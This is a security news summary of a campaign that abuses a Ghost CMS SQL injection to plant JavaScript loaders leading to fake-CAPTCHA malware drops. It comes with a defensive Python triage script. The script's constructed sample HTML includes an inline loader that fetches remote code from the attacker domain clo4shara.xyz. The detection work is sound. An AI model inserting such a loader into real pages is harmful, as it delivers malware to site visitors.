Overview
- QiAnXin XLab reported on May 25 that researchers had identified a large campaign that has compromised more than 700 sites across universities, AI and SaaS firms, media outlets, fintech firms, and independent blogs.
- The root bug is CVE-2026-26980, an SQL injection affecting Ghost 3.24.0 through 6.19.0 that lets unauthenticated attackers read database contents, including Admin API keys; Ghost shipped the fix in version 6.19.1 on February 19, but many sites remain unpatched.
- Attackers exploit the SQL injection to steal a site’s Admin API key and then use the Ghost Admin API to insert a tiny JavaScript loader into published pages.
- That loader contacts a second-stage PHP cloaker hosted at clo4shara[.]xyz, which uses the commercial Adspect service to fingerprint visitors and serve a fake CAPTCHA iframe that instructs victims to paste a Base64-encoded command into the Windows Run dialog, dropping malware.
- Observed payloads include DLL loaders, JavaScript droppers, and an Electron installer. Researchers advise administrators to upgrade Ghost, rotate any exposed API keys, remove injected scripts using the published IoCs, preserve Admin API logs for investigation, and watch for rapid re-infection, since at least two competing attacker clusters are exploiting the bug.
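The triage steps above (check the Ghost version, hunt for the injected loader using the published IoC domain) can be scripted against a site's rendered HTML. The following is an added example written for this page, not code from QiAnXin XLab, Ghost, or the campaign. It assumes the page HTML has already been fetched, that Ghost's default `ghost_head` helper emits a `<meta name="generator" content="Ghost MAJOR.MINOR">` tag (so the tag alone cannot distinguish 6.19.0 from 6.19.1, which the code flags for manual verification), and that the only IoC used is the cloaker domain named in the report; the sample HTML and the script paths under that domain are constructed test data.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not content from any compromised site): a Ghost-rendered
# post with an external loader tag and an inline loader appended.
SAMPLE_HTML = """<!DOCTYPE html>
<html><head>
<meta charset="utf-8">
<meta name="generator" content="Ghost 6.19">
<script src="/assets/built/main.js"></script>
<script async src="https://clo4shara.xyz/js/loader.js"></script>
</head><body>
<script>(function(){var s=document.createElement('script');
s.src='https://clo4shara.xyz/c/t.php?v=1';document.head.appendChild(s);})();</script>
<p>Hello world</p>
</body></html>"""

# IoC domain from the XLab report, written defanged as it appears in the write-up.
IOC_DOMAINS = ("clo4shara[.]xyz",)

# Affected range taken from the advisory summary above: 3.24.0 .. 6.19.0, fixed in 6.19.1.
FIRST_AFFECTED = (3, 24, 0)
FIXED = (6, 19, 1)


class ScriptCollector(HTMLParser):
    """Collects every <script> (src attribute + inline body) and the generator meta tag."""

    def __init__(self):
        super().__init__()
        self.scripts = []        # list of (src or None, inline body)
        self.generator = None    # content of <meta name="generator">
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and a.get("name") == "generator":
            self.generator = a.get("content")
        elif tag == "script":
            self._in_script = True
            self._src = a.get("src")
            self._buf = []

    def handle_data(self, data):
        # HTMLParser treats <script> content as CDATA and delivers it here.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf).strip()))
            self._in_script = False


def refang(domain):
    """Turn a defanged IoC such as example[.]com back into a matchable hostname."""
    return domain.replace("[.]", ".").lower()


def find_injected_scripts(html, ioc_domains=IOC_DOMAINS):
    """Return scripts whose src or inline body references a known IoC domain.

    Matching on the inline body as well as src catches loaders that build the
    second-stage URL at runtime instead of using a plain <script src=...>.
    """
    p = ScriptCollector()
    p.feed(html)
    needles = [refang(d) for d in ioc_domains]
    hits = []
    for src, body in p.scripts:
        haystack = f"{src or ''} {body}".lower()
        if any(n in haystack for n in needles):
            hits.append({"src": src, "inline": body[:80]})
    return hits


def ghost_version_status(html):
    """Classify the page's Ghost version against the CVE-2026-26980 range.

    Returns 'not-affected', 'affected', 'fixed', 'verify-patch-level' (generator
    tag says 6.19 but carries no patch number) or 'unknown' (no generator tag).
    """
    p = ScriptCollector()
    p.feed(html)
    m = re.match(r"Ghost (\d+)\.(\d+)(?:\.(\d+))?", p.generator or "")
    if not m:
        return "unknown"
    major, minor, patch = int(m.group(1)), int(m.group(2)), m.group(3)
    if (major, minor) < FIRST_AFFECTED[:2]:
        return "not-affected"
    if (major, minor) > FIXED[:2]:
        return "fixed"
    if (major, minor) == FIXED[:2]:
        if patch is None:
            return "verify-patch-level"   # 6.19.0 vulnerable, 6.19.1 fixed; tag can't tell
        return "fixed" if int(patch) >= FIXED[2] else "affected"
    return "affected"


def triage_page(html):
    """One-shot summary a responder would log per site."""
    return {"version": ghost_version_status(html), "ioc_hits": find_injected_scripts(html)}


if __name__ == "__main__":
    print(triage_page(SAMPLE_HTML))
```

A `verify-patch-level` result means the generator tag is not enough: confirm the exact version from the Ghost admin UI or the install itself. An empty `ioc_hits` list only rules out the one published domain; an attacker who rotates infrastructure, or the second cluster mentioned above, will not match, so also diff the site's code-injection settings and post contents against a known-good backup.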